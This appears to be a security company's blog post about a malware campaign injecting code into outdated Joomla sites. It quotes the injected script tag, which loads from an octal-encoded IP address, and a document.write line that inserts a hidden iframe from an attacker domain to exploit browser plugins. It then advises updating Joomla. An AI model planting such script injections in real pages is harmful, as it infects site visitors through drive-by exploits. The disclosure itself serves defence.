Very busy week in terms of malware. First Hilary Kneber decided to make a come back, inlovebot.com and crazymasya.com reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, the IP address 18.104.22.168 in octal).
This is the code added to the hacked sites:
<script src="http://0133.0331.0242.0033/0132.js" >..
This is being used to load a malicious iframe from external web sites ( javadisplay.com, mainborder.com, etc):
document . write("<iframe src="http://mainborder.com/in.cgi?2" width =`1`…
This iframe then tries to infect the computer using multiple vulnerabilities (in Java, PDF, flash, etc). These are some of the domains being used to distribute the malware:
This is the Whois info for those domains:
Vladimir Fedorov (email@example.com)
9 Ivana Babushkina st. app.34
If you are using Joomla, make sure it is updated to the latest version and properly monitored. If you site is currently infected, you can sign up here to get it cleaned up / secured.
If you have any question, let us know.